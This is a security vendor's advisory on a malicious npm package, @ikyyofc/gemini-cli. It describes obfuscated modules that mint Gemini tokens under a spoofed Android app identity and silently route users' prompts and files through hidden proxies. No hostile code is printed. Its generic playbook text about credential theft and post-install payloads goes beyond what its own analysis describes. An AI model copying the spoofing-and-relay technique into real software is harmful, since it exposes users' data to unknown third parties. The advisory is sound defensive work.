@ikyyofc/gemini-clinpm
Malicious code in @ikyyofc/gemini-cli (npm) Remove it immediately and rotate any exposed credentials.
What this malware does
@ikyyofc/[email protected] ships two heavily obfuscated modules (src/gemini.js and src/utils/proxy.js) wrapped in an obfuscator.io-style string-array + RC4-XOR decoder (220-entry encrypted string array, hex-mangled identifiers like _0x4693ef, _0x29cf). Decoding reveals two coordinated behaviors that make this package unsafe for installers to use:
-
Spoofed Google/Firebase Android-app identity for Gemini access. src/gemini.js exposes a getToken() that POSTs to a hidden URL with hardcoded
X-Android-Package,X-Android-Cert(SHA1 cert fingerprint), andX-Firebase-GMPIDheaders plus a hardcodedclientType, then attaches the returned Bearer token to Gemini API calls. The CLI never asks the user for a Google API key; instead it ships a third-party Android application's identity to mint Gemini tokens on the installer's behalf. Every installer who uses the CLI is making Google Gemini API calls under a stolen client identity, exposing them to abuse-of-service and ToS-violation consequences if Google revokes or flags that identity. -
Silent relay through a hardcoded pool of ~13 third-party proxies. index.js calls
setupGlobalProxy()at startup, which installs a global axios request interceptor in src/utils/proxy.js that rewrites every outgoing request URL viawrapUrl(proxy, originalUrl)to traverse one of ~13 hardcoded proxy hosts. The user's chat prompts and attached file contents (up to 20 MB) are carried in the Gemini POST body and therefore visible in cleartext to the proxy operators. The README does not disclose any proxy/relay behavior; the proxy list is encrypted within the obfuscated bundle to prevent users discovering it through source review.
The combination — obfuscation that hides the data flow, spoofed third-party credentials carrying the installer's API requests, and an undisclosed third-party relay reading prompt content and the Bearer token — is a silent-relay supply-chain pattern. Any developer who installs and runs this CLI leaks the contents of their conversations and any file they attach to operators they never consented to trust, while also operating under a credential that does not belong to them.
Malicious versions
Indicators of compromise (SHA-256)
Detection & response playbook
Credential / info stealerFind it
Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for @ikyyofc/gemini-cli (17 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging @ikyyofc/gemini-cli across your stack and pipelines.
If you installed it — respond
@ikyyofc/gemini-cli is built to steal secrets, so assume every credential the build or runtime could read is compromised. Remove it from your project and lockfile, then rotate ALL exposed secrets — npm/registry tokens, cloud keys, CI/CD secrets, SSH keys, and any .env values — from a known-clean machine. Audit logs for unauthorized use of those credentials.
Did it already run?
If @ikyyofc/gemini-cli was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.
How O3 protects you
O3 blocks @ikyyofc/gemini-cli before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.
Frequently asked questions
Campaign
References
Credits
- Amazon Inspector · finder
Detect & block this
O3 blocks @ikyyofc/gemini-cli-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the credential exfiltration and severs the channel.